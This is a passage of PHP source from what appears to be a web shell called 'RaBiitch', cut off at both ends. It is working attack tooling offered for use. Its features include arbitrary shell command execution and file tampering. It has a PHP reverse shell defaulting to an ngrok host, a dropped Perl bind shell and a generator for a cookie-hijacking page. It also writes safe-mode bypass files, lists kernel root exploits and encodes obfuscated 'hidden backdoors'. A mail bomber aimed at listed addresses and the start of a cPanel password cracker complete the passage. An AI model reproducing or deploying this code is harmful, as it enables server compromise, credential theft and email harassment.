  1107. <a href='{$self}?zip={$fil}'> Download </a>
  1108. </td>";
  1109. }
  1110. echo "</tr></table></div>";
  1111. }
  1112. function rename_bg() {
  1113. if(isset($_GET['old_name']) && isset($_GET['new_name'])) {
  1114. $o_r_path = basename($_GET['old_name']);
  1115. $r_path = str_replace($o_r_path, "",
  1116. $_GET['old_name']);
  1117. $r_new_name = $r_path . $_GET['new_name'];
  1118. echo $r_new_name;
  1119. if(rename($_GET['old_name'], $r_new_name) == FALSE) {
  1120. alert("Access Denied for this action!!!");
  1121. } else {
  1122. alert("Renamed File Succeessfully");
  1123. }
  1124. }
  1125. }
  1126. function edit_file() {
  1127. $path = $_GET['path'];
  1128. chdir($path);
  1129. $edt_file = $_GET['edit'];
  1130. $e_content = wordwrap(htmlspecialchars(file_get_contents($edt_file)));
  1131. if($e_content) {
  1132. $o_content = $e_content;
  1133. } else if(function_exists('fgets') && function_exists('fopen')
  1134. && function_exists('feof')) {
  1135. $fd = fopen($edt_file, "rb");
  1136. if(!$fd) {
  1137. alert("Permission Denied");
  1138. } else {
  1139. while(!feof($fd)) {
  1140. $o_content = wordwrap(htmlspecialchars(fgets($fd)));
  1141. }
  1142. }
  1143. fclose($fd);
  1144. }
  1145. echo "<div id='result'>
  1146. <center><h2>Edit
  1147. File</h2><hr></center><br>
  1148. <font color=red>View File</font> : <font
  1149. color=yellow><a style='text-decoration:none; color:yellow;'
  1150. href='?read=" . $_GET['edit'] . "'>" .
  1151. basename($_GET['edit']) . "</a><br /><br
  1152. /><hr><br></font>
  1153. <form method='POST'><input type='hidden' name='e_file'
  1154. value=" . $_GET['edit'] . ">
  1155. <center><textarea spellcheck='false'
  1156. class='textarea_edit' name='e_content_n' cols='80' rows='25'>" .
  1157. $o_content . "</textarea></center>
  1158. <hr>
  1159. <input class='input_big' name='save' type='submit'
  1160. value='Submit'
  1161. ><br><br><hr><br><br></div>";
  1162. }
  1163. function edit_file_bg() {
  1164. if(file_exists($_POST['e_file'])) {
  1165. $handle = fopen($_POST['e_file'], "w+");
  1166. if(!handle) {
  1167. alert("Permission Denied");
  1168. } else {
  1169. fwrite($handle, $_POST['e_content_n']);
  1170. alert("Your changes were Successfully Saved!");
  1171. }
  1172. fclose($handle);
  1173. } else {
  1174. alert("File Not Found!!!");
  1175. }
  1176. }
  1177. function delete_file() {
  1178. $del_file = $_GET['del_fil'];
  1179. if(unlink($del_file) != FALSE) {
  1180. alert("Deleted Successfully");
  1181. exit;
  1182. } else {
  1183. alert("Access Denied for this Operation");
  1184. exit;
  1185. }
  1186. }
  1187. function deldirs($d_dir) {
  1188. $d_files = glob($d_dir . '*', GLOB_MARK);
  1189. foreach($d_files as $d_file) {
  1190. if(is_dir($d_file)) {
  1191. deldirs($d_file);
  1192. } else {
  1193. unlink($d_file);
  1194. }
  1195. }
  1196. if(is_dir($d_dir)) {
  1197. if(rmdir($d_dir)) {
  1198. alert("File berhasil dihapus");
  1199. } else {
  1200. alert("Access Denied for this Operation");
  1201. }
  1202. }
  1203. }
  1204. function code_viewer() {
  1205. $path = $_GET['path'];
  1206. $r_file = $_GET['read'];
  1207. $r_content = wordwrap(htmlspecialchars(file_get_contents($r_file)));
  1208. if($r_content) {
  1209. $rr_content = $r_content;
  1210. } else if(function_exists('fgets') && function_exists('fopen')
  1211. && function_exists('feof')) {
  1212. $fd = fopen($r_file, "rb");
  1213. if(!$fd) {
  1214. alert("Permission Denied");
  1215. } else {
  1216. while(!feof($fd)) {
  1217. $rr_content = wordwrap(htmlspecialchars(fgets($fd)));
  1218. }
  1219. }
  1220. fclose($fd);
  1221. }
  1222. echo "<div id=result><center><h2>View
  1223. File</h2></center><hr><br>
  1224. <font color=red>Edit File</font><font color=yellow> :
  1225. </font>
  1226. <font color=#999><a style='text-decoration:none; color:yellow;'
  1227. href='?path={$path}&amp;edit=" . $_GET['read'] .
  1228. "'>"
  1229. . basename($_GET['read']) .
  1230. "</a></font><br><br><hr><pre><code>"
  1231. . $rr_content . "</code></pre>
  1232. <br><br><hr><br><br></div>";
  1233. }
  1234. function copy_file_ui() {
  1235. echo "<div id=result><center><h2>Copy
  1236. File</h2><hr /><br /><br /><table
  1237. class=table><form method='GET'><tr><td
  1238. style='text-align:center;'>Copy : <input size=40 name='c_file'
  1239. value=" . $_GET['copy'] . " > To : <input size=40
  1240. name='c_target' value=" . $_GET['path'] . $sep . "> Name :
  1241. <input name='cn_name'><input type='submit' value='
  1242. O'></form></table><br><br><hr><br><br><br></center></div>";
  1243. }
  1244. function copy_file_bg() {
  1245. global $sep;
  1246. if(function_exists(copy)) {
  1247. if(copy($_GET['c_file'], $_GET['c_target'] . $sep .
  1248. $_GET['cn_name'])) {
  1249. alert("Succeded");
  1250. } else {
  1251. alert("Access Denied");
  1252. }
  1253. }
  1254. }
  1255. function ch_perm_bg() {
  1256. if(isset($_GET['p_filex']) && isset($_GET['new_perm'])) {
  1257. if(chmod($_GET['p_filex'], $_GET['new_perm']) != FALSE) {
  1258. alert("Succeded. Permission Changed!!!");
  1259. } else {
  1260. alert("Access Denied for This Operation");
  1261. }
  1262. }
  1263. }
  1264. function ch_perm_ui() {
  1265. $p_file = $_GET['perm'];
  1266. echo "<div id =result>
  1267. <center><h2>New Permission</h2><hr /><p>
  1268. <form method
  1269. '>
  1270. <input type='hidden' name='path' value=" . getcwd() . "
  1271. ><input name='p_filex' type=hidden
  1272. value={$p_file} >New Permission : <input name='new_perm' isze='40'
  1273. value=0" . substr(sprintf('%o', fileperms($p_file)), -3) .
  1274. "><input type='submit' value=' O'
  1275. /></form></p><p>Full Access : <font
  1276. color=red>755</font><br />Notice : <font
  1277. color=red>Don't use Unix Access like 777, 666, etc. Use 755, 655,
  1278. etc</p><br /><br /><hr /><br /><br
  1279. /></center></div>";
  1280. ch_perm_bg();
  1281. }
  1282. function mk_file_ui() {
  1283. chdir($_GET['path']);
  1284. echo "<div id=result><br><br><font
  1285. color=red><form method='GET'>
  1286. <input type='hidden' name='path' value=" . getcwd() .
  1287. ">
  1288. New File Name : <input size='40' name='new_f_name'
  1289. value=" . $_GET['new_file'] .
  1290. "></font><br><br><hr><br><center>
  1291. <textarea spellcheck='false' cols='80' rows='25'
  1292. class=textarea_edit
  1293. name='n_file_content'></textarea></center><hr>
  1294. <input class='input_big' type='submit'
  1295. value='Submit'></form></center></div>";
  1296. }
  1297. function mk_file_bg() {
  1298. chdir($_GET['path']);
  1299. $c_path = $_GET['path'];
  1300. $c_file = $_GET['new_f_name'];
  1301. $c_file_contents = $_GET['n_file_content'];
  1302. $handle = fopen($c_file, "w");
  1303. if(!$handle) {
  1304. alert("Permission Denied");
  1305. } else {
  1306. fwrite($handle, $c_file_contents);
  1307. alert("Your changes were Successfully Saved!");
  1308. }
  1309. fclose($handle);
  1310. }
  1311. function create_dir() {
  1312. chdir($_GET['path']);
  1313. $new_dir = $_GET['new_dir'];
  1314. if(is_writable($_GET['path'])) {
  1315. mkdir($new_dir);
  1316. alert("Direcory Created Successfully");
  1317. exit;
  1318. } else {
  1319. alert("Access Denied for this Operation");
  1320. exit;
  1321. }
  1322. }
  1323. function cmd($cmd) {
  1324. chdir($_GET['path']);
  1325. $res = "";
  1326. if($_GET['cmdexe']) {
  1327. $cmd = $_GET['cmdexe'];
  1328. }
  1329. if(function_exists('shell_exec')) {
  1330. $res = shell_exec($cmd);
  1331. } else if(function_exists('exec')) {
  1332. exec($cmd, $res);
  1333. $res = join("\n", $res);
  1334. } else if(function_exists('system')) {
  1335. ob_start();
  1336. system($cmd);
  1337. $res = ob_get_contents();
  1338. ob_end_clean();
  1339. } elseif(function_exists('passthru')) {
  1340. ob_start();
  1341. passthru($cmd);
  1342. $res = ob_get_contents();
  1343. ob_end_clean();
  1344. } else if(function_exists('proc_open')) {
  1345. $descriptorspec = array(
  1346. 0 => array(
  1347. "pipe",
  1348. "r"
  1349. ),
  1350. 1 => array(
  1351. "pipe",
  1352. "w"
  1353. ),
  1354. 2 => array(
  1355. "pipe",
  1356. "w"
  1357. )
  1358. );
  1359. $handle = proc_open($cmd, $descriptorspec, $pipes);
  1360. if(is_resource($handle)) {
  1361. if(function_exists('fread') &&
  1362. function_exists('feof'))
  1363. {
  1364. while(!feof($pipes[1])) {
  1365. $res .= fread($pipes[1], 512);
  1366. }
  1367. } else if(function_exists('fgets') &&
  1368. function_exists('feof')) {
  1369. while(!feof($pipes[1])) {
  1370. $res .= fgets($pipes[1], 512);
  1371. }
  1372. }
  1373. }
  1374. pclose($handle);
  1375. } else if(function_exists('popen')) {
  1376. $handle = popen($cmd, "r");
  1377. if(is_resource($handle)) {
  1378. if(function_exists('fread') &&
  1379. function_exists('feof'))
  1380. {
  1381. while(!feof($handle)) {
  1382. $res .= fread($handle, 512);
  1383. }
  1384. } else if(function_exists('fgets') &&
  1385. function_exists('feof')) {
  1386. while(!feof($handle)) {
  1387. $res .= fgets($handle, 512);
  1388. }
  1389. }
  1390. }
  1391. pclose($handle);
  1392. }
  1393. $res = wordwrap(htmlspecialchars($res));
  1394. if($_GET['cmdexe']) {
  1395. echo "<div id=result><center><font
  1396. color=yellow><h2>root@RaBiitch:~#</h2></center><hr><pre>"
  1397. . $res . "</font></pre></div>";
  1398. }
  1399. return $res;
  1400. }
  1401. function upload_file() {
  1402. chdir($_POST['path']);
  1403. if(move_uploaded_file($_FILES['upload_f']['tmp_name'],
  1404. $_FILES['upload_f']['name'])) {
  1405. alert("Uploaded File Successfully");
  1406. } else {
  1407. alert("Access Denied!!!");
  1408. }
  1409. }
  1410. function reverse_conn_ui() {
  1411. global $your_ip;
  1412. echo "<div id='result'>
  1413. <center><h2>Reverse Shell</h2><hr>
  1414. <br><br><form method='GET'>
  1415. <table class=tbl>
  1416. <tr>
  1417. <td>Your IP : <input name='my_ip'
  1418. value='0.tcp.ngrok.io'>
  1419. <br>
  1420. PORT : <input name='my_port' value='40141'>
  1421. <input type='submit' value='Submit'></td></tr>
  1422. <select name='rev_option'
  1423. style='color:yellow;background-color:black;border:1px solid #666;'>
  1424. <option>PHP Reverse Shell</option>
  1425. <option>PERL Bind Shell</option>
  1426. </select></form>
  1427. <tr><td>
  1428. <font color=red>PHP Reverse Shell</font> : <font
  1429. color=yellow> nc -lvp
  1430. <i>port</i></font></td></tr><tr><td><font
  1431. color=red>PERL Bind Shell</font> : <font color=yellow> nc
  1432. <i>server_ip
  1433. port</i></font></td></tr></table></div>";
  1434. }
  1435. function reverse_conn_bg() {
  1436. global $os;
  1437. $option = $_REQUEST['rev_option'];
  1438. $ip = $_GET['my_ip'];
  1439. $port = $_GET['my_port'];
  1440. if($option == "PHP Reverse Shell") {
  1441. echo "<div
  1442. id=result><h2>RESULT<h2><hr><br>";
  1443. function printit($string) {
  1444. if(!$daemon) {
  1445. print "$string\n";
  1446. }
  1447. }
  1448. $chunk_size = 1400;
  1449. $write_a = null;
  1450. $error_a = null;
  1451. $shell = 'uname -a; w; id; /bin/sh -i';
  1452. $daemon = 0;
  1453. $debug = 0;
  1454. if(function_exists('pcntl_fork')) {
  1455. $pid = pcntl_fork();
  1456. if($pid == -1) {
  1457. printit("ERROR: Can't fork");
  1458. exit(1);
  1459. }
  1460. if($pid) {
  1461. exit(0);
  1462. }
  1463. if(posix_setsid() == -1) {
  1464. printit("Error: Can't setsid()");
  1465. exit(1);
  1466. }
  1467. $daemon = 1;
  1468. } else {
  1469. printit("WARNING: Failed to daemonise. This is quite
  1470. common and not fatal.");
  1471. }
  1472. chdir("/");
  1473. umask(0);
  1474. $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  1475. if(!$sock) {
  1476. printit("$errstr ($errno)");
  1477. exit(1);
  1478. }
  1479. $descriptorspec = array(
  1480. 0 => array(
  1481. "pipe",
  1482. "r"
  1483. ),
  1484. 1 => array(
  1485. "pipe",
  1486. "w"
  1487. ),
  1488. 2 => array(
  1489. "pipe",
  1490. "w"
  1491. )
  1492. );
  1493. $process = proc_open($shell, $descriptorspec, $pipes);
  1494. if(!is_resource($process)) {
  1495. printit("ERROR: Can't spawn shell");
  1496. exit(1);
  1497. }
  1498. stream_set_blocking($pipes[0], 0);
  1499. stream_set_blocking($pipes[1], 0);
  1500. stream_set_blocking($pipes[2], 0);
  1501. stream_set_blocking($sock, 0);
  1502. printit("<font color=yellow>Successfully opened reverse
  1503. shell to $ip:$port </font>");
  1504. while(1) {
  1505. if(feof($sock)) {
  1506. printit("ERROR: Shell connection terminated");
  1507. break;
  1508. }
  1509. if(feof($pipes[1])) {
  1510. printit("ERROR: Shell process terminated");
  1511. break;
  1512. }
  1513. $read_a = array(
  1514. $sock,
  1515. $pipes[1],
  1516. $pipes[2]
  1517. );
  1518. $num_changed_sockets = stream_select($read_a, $write_a,
  1519. $error_a, null);
  1520. if(in_array($sock, $read_a)) {
  1521. if($debug)
  1522. printit("SOCK READ");
  1523. $input = fread($sock, $chunk_size);
  1524. if($debug)
  1525. printit("SOCK: $input");
  1526. fwrite($pipes[0], $input);
  1527. }
  1528. if(in_array($pipes[1], $read_a)) {
  1529. if($debug)
  1530. printit("STDOUT READ");
  1531. $input = fread($pipes[1], $chunk_size);
  1532. if($debug)
  1533. printit("STDOUT: $input");
  1534. fwrite($sock, $input);
  1535. }
  1536. if(in_array($pipes[2], $read_a)) {
  1537. if($debug)
  1538. printit("STDERR READ");
  1539. $input = fread($pipes[2], $chunk_size);
  1540. if($debug)
  1541. printit("STDERR: $input");
  1542. fwrite($sock, $input);
  1543. }
  1544. }
  1545. fclose($sock);
  1546. fclose($pipes[0]);
  1547. fclose($pipes[1]);
  1548. fclose($pipes[2]);
  1549. proc_close($process);
  1550. echo
  1551. "<br><br><hr><br><br></div>";
  1552. } else if($option == "PERL Bind Shell") {
  1553. global $bind_perl, $os;
  1554. $pbfl = $bind_perl;
  1555. $handlr = fopen("back.pl", "wb");
  1556. if($handlr) {
  1557. fwrite($handlr, gzinflate(base64_decode($bind_perl)));
  1558. } else {
  1559. alert("Access Denied for create new file");
  1560. }
  1561. fclose($handlr);
  1562. if(file_exists("back.pl")) {
  1563. if($os == "nix") {
  1564. cmd("chmod +x back.pl;perl back.pl $port");
  1565. } else {
  1566. cmd("perl back.pl $port");
  1567. }
  1568. }
  1569. }
  1570. }
  1571. function cookie_jack() {
  1572. global $cookie_highjacker;
  1573. echo "<div
  1574. id=result><center><h2>NOTICE</h2><hr/>";
  1575. if(function_exists('fopen') && function_exists('fwrite')) {
  1576. $cook = gzinflate(base64_decode($cookie_highjacker));
  1577. $han_le = fopen("404.php", "w+");
  1578. if($han_le) {
  1579. fwrite($han_le, $cook);
  1580. echo "Yes... Cookie highjacker is generated<br>
  1581. Name
  1582. : <a style='color:yellow;' target=_blank
  1583. href=404.php>404.php</a></font>.<br
  1584. />It is usefull in XSS<br />It will make a file
  1585. <font color=red>configuration.txt</font> in this direcory and
  1586. save the cookie value in it. :p cheers...<br /><br /><hr
  1587. /><br /><br /></center></div>";
  1588. } else {
  1589. echo "<font color=red>Sorry... Generate COOKIE
  1590. HIGHJACKER failed<br /><br /><hr /><br /><br
  1591. /></center></div>";
  1592. }
  1593. }
  1594. }
  1595. function safe_mode_fuck() {
  1596. global $s_php_ini, $s_htaccess, $s_htaccess_pl, $ini_php;
  1597. $path = chdir($_GET['path']);
  1598. chdir($_GET['path']);
  1599. switch($_GET['safe_mode']) {
  1600. case "s_php_ini":
  1601. $s_file = $s_php_ini;
  1602. $s_name = "php.ini";
  1603. break;
  1604. case "s_htaccess":
  1605. $s_name = ".htaccess";
  1606. $s_file = $s_htaccess;
  1607. break;
  1608. case "s_htaccess_pl":
  1609. $s_name = ".htaccess";
  1610. $s_file = $s_htaccess_pl;
  1611. break;
  1612. case "s_ini_php":
  1613. $s_name = "ini.php";
  1614. $s_file = $ini_php;
  1615. break;
  1616. }
  1617. if(function_exists('fopen') && function_exists('fwrite')) {
  1618. $s_handle = fopen("$s_name", "w+");
  1619. if($s_handle) {
  1620. fwrite($s_handle, $s_file);
  1621. alert("Operation Succeed!!!");
  1622. } else {
  1623. alert("Access Denied!!!");
  1624. }
  1625. fclose($s_handle);
  1626. }
  1627. }
  1628. function ceklog() {
  1629. echo "
  1630. <style>
  1631. hr{color:silver;}
  1632. </style>
  1633. <pre>";
  1634. error_reporting(0);
  1635. class jalanin {
  1636. public function cuk($patch) {
  1637. foreach(scandir($patch) as $d) {
  1638. if($d!='.' && $d!='..') {
  1639. $d = $patch.DIRECTORY_SEPARATOR.$d;
  1640. if(!is_dir($d)) {
  1641. jalanin::cek($d);
  1642. } else {
  1643. jalanin::cuk($d);
  1644. }
  1645. }
  1646. }
  1647. }
  1648. public function cek($patch){
  1649. $exif="/exif_read_data/";
  1650. preg_match($exif,file_get_contents(addslashes($patch)), $match);
  1651. if($match[0]) {
  1652. echo "<font color='yellow'>[EXECUTION FILE]
  1653. ".$patch."</font><br><hr>";
  1654. } else if(exif_read_data($patch)) {
  1655. echo "<font color='red'>[LOGGER DETECTED]
  1656. ".$patch."</font><br><hr>";
  1657. } else {
  1658. echo "<font color='lime'>[FILE SAFE]
  1659. ".$patch."</font><br><hr>";
  1660. }
  1661. }
  1662. }
  1663. jalanin::cuk(getcwd());
  1664. }
  1665. function safe_mode_fuck_ui() {
  1666. global $path;
  1667. $path = getcwd();
  1668. echo "<div id=result><br>
  1669. <center><h2>Select Your Options</h2>
  1670. <hr>
  1671. <table class=tbl size=10><tr><td><a
  1672. href=?path={$path}&amp;safe_mode=s_php_ini>php.ini</a></td>
  1673. <td><a
  1674. href=?path={$path}&amp;safe_mode=s_htaccess>.htaccess</a></td>
  1675. <td><a
  1676. href=?path={$path}&amp;safe_mode=s_htaccess_pl>.htacces
  1677. (perl)</td>
  1678. <td><a
  1679. href=?path={$path}&amp;safe_mode=s_ini_php>ini.php</td></tr></table><br><br></div>";
  1680. }
  1681. function AccessDenied() {
  1682. global $path, $forbid_dir;
  1683. $path = $_GET['path'];
  1684. chdir($path);
  1685. if(function_exists('fopen') && function_exists('fwrite')) {
  1686. $forbid = fopen(".htaccess", "wb");
  1687. if($forbid) {
  1688. fwrite($forbid, $forbid_dir);
  1689. alert("Opreation Succeeded");
  1690. } else {
  1691. alert("Access Denied");
  1692. }
  1693. fclose($forbid);
  1694. }
  1695. }
  1696. function r00t_exploit() {
  1697. $kernel = php_uname();
  1698. $r00t_db = array(
  1699. '2.6.19' => 'jessica',
  1700. '2.6.20' => 'jessica',
  1701. '2.6.21' => 'jessica',
  1702. '2.6.22' => 'jessica',
  1703. '2.6.23' => 'jessica,vmsplice',
  1704. '2.6.24' => 'jessica,vmspice',
  1705. '2.6.31' => 'enlightment',
  1706. '2.6.18' => 'brk,ptrace,kmod,brk2',
  1707. '2.6.17' => 'prctl3,raptor_prctl,py2',
  1708. '2.6.16' => 'raptor_prctl,exp.sh,raptor,raptor2,h00lyshit',
  1709. '2.6.15' => 'py2,exp.sh,raptor,raptor2,h00lyshit',
  1710. '2.6.14' => 'raptor,raptor2,h00lyshit',
  1711. '2.6.13' =>
  1712. 'kdump,local26,py2,raptor_prctl,exp.sh,prctl3,h00lyshit',
  1713. '2.6.12' => 'h00lyshit',
  1714. '2.6.11' => 'krad3, krad,h00lyshit',
  1715. '2.6.10' => 'h00lyshit,stackgrow2,uselib24,exp.sh,krad,krad2',
  1716. '2.6.9' => 'exp.sh,krad3,py2, prctl3,h00lyshit',
  1717. '2.6.8' => 'h00lyshit, krad, krad2',
  1718. '2.6.7' => 'h00lyshit,krad,krad2',
  1719. '2.6.6' => 'h00lyshit,krad,krad2',
  1720. '2.6.2' => 'h00lyshit,krad,mremap_pte',
  1721. '2.6.' => 'prctl,kmdx,newsmp,pwned,ptrace_kmod,ong_bak',
  1722. '2.4.29' => 'elflbl,expand_stack,stackgrow2,uselib24,smpracer',
  1723. '2.4.27' => 'elfdump,uselib24',
  1724. '2.4.25' => 'uselib24',
  1725. '2.4.24' => 'mremap_pte,loko,uselib24',
  1726. '2.4.23' => 'mremap_pte,loko,uselib24',
  1727. '2.4.22' =>
  1728. 'loginx,brk,km2,loko,ptrace,uselib24,brk2,ptrace-kmod',
  1729. '2.4.21' => 'w00t,brk,uselib24,loginx,brk2,ptrace-kmod',
  1730. '2.4.20' => 'mremap_pte,
  1731. w00t,brk,ave,uselib24,loginx,ptrace-kmod,ptrace,kmod',
  1732. '2.4.19' => 'newlocal,w00t,ave,uselib24,loginx,kmod',
  1733. '2.4.18' => 'km2, w00t,uselib24,loginx,kmod',
  1734. '2.4.17' => 'newlocal,w00t,uselib24,loginx,kmod',
  1735. '2.4.16' => 'w00t,uselib24,loginx',
  1736. '2.4.10' => 'w00t,brk,uselib24,loginx',
  1737. '2.4.9' => 'ptrace24,uselib24',
  1738. '2.4.' => 'kmdx,remap,pwned,ptrace_kmod,ong_bak',
  1739. '2.2.25' => 'mremap_pte',
  1740. '2.2.24' => 'ptrace',
  1741. '2.2.' => 'rip,ptrace'
  1742. );
  1743. foreach($r00t_db as $kern => $exp) {
  1744. if(strstr($kernel, $kern)) {
  1745. return $exp;
  1746. } else {
  1747. $exp = '<font color="red">Not
  1748. found.</font>';
  1749. return $exp;
  1750. }
  1751. }
  1752. }
  1753. function php_ende_ui() {
  1754. echo "
  1755. <div id=result><center><h2>PHP
  1756. ENCODE/DECODE</h2></center><hr><form
  1757. method='post'>
  1758. <table class=tbl>
  1759. <tr><td>
  1760. Method : <select name='typed'
  1761. style='color:yellow;background-color:black;border:1px solid#666;'>
  1762. <option>Encode</option>
  1763. <option>Decode</decode>
  1764. </select>
  1765. TYPE : <select name='typenc'
  1766. style='color:yellow;background-color:black;border:1px solid #666;'>
  1767. <option>GZINFLATE</option>
  1768. <option>GZUNCOMPRESS</option>
  1769. <option>STR_ROT13</option>
  1770. </tr></td><tr>
  1771. <td><textarea spellcheck='false' class=textarea_edit cols='80'
  1772. rows='25'
  1773. name='php_content'></textarea></tr></td></table><hr>
  1774. <input class='input_big' type='submit'
  1775. value='Submit'><br><hr><br><br></form></div>";
  1776. }
  1777. function php_ende_bg() {
  1778. $meth_d = $_POST['typed'];
  1779. $typ_d = $_POST['typenc'];
  1780. $c_ntent = $_POST['php_content'];
  1781. $c_ntent = $c_ntent;
  1782. switch($meth_d) {
  1783. case "Encode":
  1784. switch($typ_d) {
  1785. case "GZINFLATE":
  1786. $res_t =
  1787. base64_encode(gzdeflate(trim(stripslashes($c_ntent . ' '), '<?php,
  1788. ?>'), 9));
  1789. $res_t = "<?php
  1790. eval(gzinflate(base64_decode(\"$res_t\")));
  1791. ?>";
  1792. break;
  1793. case "GZUNCOMPRESS":
  1794. $res_t =
  1795. base64_encode(gzcompress(trim(stripslashes($c_ntent . ' '), '<?php,
  1796. ?>'), 9));
  1797. $res_t = "<?php
  1798. eval(gzuncompress(base64_decode(\"$res_t\")));
  1799. ?>";
  1800. break;
  1801. case "STR_ROT13":
  1802. $res_t = trim(stripslashes($c_ntent . ' '), '<?php,
  1803. ?>');
  1804. $res_t = base64_encode(str_rot13($res_t));
  1805. $res_t = "<?php
  1806. eval(str_rot13(base64_decode(\"$res_t\")));
  1807. ?>";
  1808. break;
  1809. }
  1810. break;
  1811. case "Decode":
  1812. switch($typ_d) {
  1813. case "GZINFLATE":
  1814. $res_t = gzinflate(base64_decode($c_ntent));
  1815. break;
  1816. case "GZUNCOMPRESS":
  1817. $res_t = gzuncompress(base64_decode($c_ntent));
  1818. break;
  1819. case "STR_ROT13":
  1820. $res_t = str_rot13(base64_decode($c_ntent));
  1821. break;
  1822. }
  1823. break;
  1824. }
  1825. echo "<div id=result><center><h2>RaBiitch
  1826. Hidden
  1827. Backdoor</h2>
  1828. <hr><textarea spellcheck='false' class=textarea_edit cols='80'
  1829. rows='25'>" . htmlspecialchars($res_t) .
  1830. "</textarea></center></div>";
  1831. }
  1832. function massmailer_ui() {
  1833. echo "<div id=result><center><h2>MASS MAILER
  1834. & MAIL BOMBER</h2><hr>
  1835. <table class=tbl width=40 style='col-width:40'>
  1836. <td><table class=tbl><tr style='float:left;'>
  1837. <td><font color=yellow size=4>Mass
  1838. Mail</font></td></tr>
  1839. <form method='POST'><tr style='float:left;'>
  1840. <td> FROM : </td>
  1841. <td><input name='from' size=40
  1842. value='admin'></td></tr><tr style='float:left;'>
  1843. <td>TO : </td><td><input size=40 name='to_mail'
  1844. value='ensikology@gmail,ensikologyofficial@gmail.com'></td></tr>
  1845. <tr style='float:left;'>
  1846. <td>Subject : </td><td><input size=40
  1847. name='subject_mail' value='Testing,'></td></tr>
  1848. <tr style='float:left;'>
  1849. <td><textarea spellcheck='false' class=textarea_edit cols='34'
  1850. rows='10' name='mail_content'>Aku melakukan
  1851. massmail :p</textarea></td>
  1852. <td><input class='input_big' type='submit'
  1853. value=O></td></tr></form></table></td>
  1854. <form method='post'>
  1855. <td> <table class='tbl'>
  1856. <td><font color=yellow size=4>Mail
  1857. Bomber</font></td></tr>
  1858. <tr style='float:left;'><td>TO : </td>
  1859. <td><input size='40' name='bomb_to'
  1860. value='kecutmasih10@gmail.com,chemicalsahinsa@yahoo.com'></td></tr><tr
  1861. style='float:left;'>
  1862. <td>Subject : </td>
  1863. <td><input size='40' name='bomb_subject' value='Bombing with
  1864. messages'></td></tr><tr style='float:left;'>
  1865. <td>No. of times</td><td><input size='40'
  1866. name='bomb_no' value='100'></td></tr><tr
  1867. style='float:left;'>
  1868. <td><textarea spellcheck='false' class=textarea_edit cols='34'
  1869. rows='10' name='bmail_content' required>I'm doing E-Mail Bombing
  1870. :p</textarea></td>
  1871. <td><input class='input_big' type='submit'
  1872. value='Submit'></td></tr></form></table>
  1873. </td></tr></table>";
  1874. }
  1875. function massmailer_bg() {
  1876. $from = $_POST['from'];
  1877. $to = $_POST['to_mail'];
  1878. $subject = $_POST['subject_mail'];
  1879. $message = $_POST['mail_content'];
  1880. if(function_exists('mail')) {
  1881. if(mail($to, $subject, $message, "From:$from")) {
  1882. echo "<div id=result><center><h2>MAIL
  1883. SPAMER</h2><hr /><br /><br /><font color=yellow
  1884. size=4>Successfully Mails
  1885. Send...</font><br><br><hr><br><br>";
  1886. } else {
  1887. echo "<div id=result><center><h2>MAIL
  1888. SPAMING</h2><hr /><br /><br /><font color=red
  1889. size=4>Sorry, failed to Mails Sending...
  1890. :(</font><br><br><hr><br><br>";
  1891. }
  1892. } else {
  1893. echo "<div id=result><center><h2>MAIL
  1894. SPAMING</h2><hr /><br /><br /><font color=red
  1895. size=4>Sorry, failed to Mails Sending... :(</font><br
  1896. /><br /><hr /><br /><br />";
  1897. }
  1898. }
  1899. function mailbomb_bg() {
  1900. $rand = rand(0, 9999999);
  1901. $to = $_POST['bomb_to'];
  1902. $from = "Polisi";
  1903. $subject = $_POST['bomb_subject'] . " ID " . $rand;
  1904. $times = $_POST['bomb_no'];
  1905. $content = $_POST['bmail_content'];
  1906. if($times == '') {
  1907. $times = 1000;
  1908. }
  1909. while($times--) {
  1910. if(function_exists('mail')) {
  1911. if(mail($to, $subject, $message, "From:$from")) {
  1912. echo "<div
  1913. id=result><center><h2>MAIL
  1914. SPAMING</h2><hr><br><br><font color=yellow
  1915. size=4>Successfully
  1916. Mails Bombed...
  1917. :p</font><br><br><hr><br><br>";
  1918. } else {
  1919. echo "<div
  1920. id=result><center><h2>MAIL
  1921. SPAMING</h2><hr><br><br><font color=red
  1922. size=4>Sorry, failed to
  1923. Mails Bombing...
  1924. :(</font><br><br><hr><br><br>";
  1925. }
  1926. } else {
  1927. echo "<div id=result><center><h2>MAIL
  1928. SPAMING</h2><hr /><br /><br /><font color=red
  1929. size=4>Sorry, failed to Mails Bombing...
  1930. :(</font><br><br><hr><br><br>";
  1931. }
  1932. }
  1933. }
  1934. function cpanel_check($host, $user, $pass, $timeout) {
  1935. set_time_limit(0);
  1936. global $cpanel_port;
  1937. $ch = curl_init();
  1938. curl_setopt($ch, CURLOPT_URL, "http://$host:" .
  1939. $cpanel_port);
  1940. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1941. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1942. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  1943. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1944. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1945. $data = curl_exec($ch);
  1946. if(curl_errno($ch) == 28) {
  1947. print "<b><font color=orange>Error :</font>
  1948. <font color=red>Connection Timeout. Please Check The Target Hostname
  1949. .</font></b>";
  1950. exit;
  1951. } else if(curl_errno($ch) == 0) {
  1952. print "<b><font face=\"Iceland\"
  1953. style=\"font-size: 9pt\"
  1954. color=\"orange\">[~]</font></b><font
  1955. face=\"Iceland\" style=\"font-size:
  1956. 9pt\"><b><font color=\"yellow\">
  1957. Cracking Success With Username &quot;</font><font
  1958. color=\"#FF0000\">$user</font><font
  1959. color=\"#008000\">\" and Password
  1960. \"</font><font
  1961. color=\"#FF0000\">$pass</font><font
  1962. color=\"#008000\">\"</font></b><br><br>";
  1963. }
  1964. curl_close($ch);
  1965. }
  1966. function cpanel_crack() {
  1967. set_time_limit(0);
  1968. global $os;
  1969. echo "<div id=result>";
  1970. $cpanel_port = "2082";
  1971. $connect_timeout = 5;
  1972. if(!isset($_POST['username']) && !isset($_POST['password'])
  1973. && !isset($_POST['target']) &&
  1974. !isset($_POST['cracktype']))
  1975. {
  1976. ?>
  1977. <center>
  1978. <form method=post>
  1979. <table class=tbl>
  1980. <tr>
  1981. <td align=center colspan=2>Target : <input type=text
  1982. name="server" value="localhost"
  1983. class=sbox></td>
  1984. </tr>
  1985. <tr>
  1986. <td align=center>User names</td><td
  1987. align=center>Password</td>
  1988. </tr>
  1989. <tr>
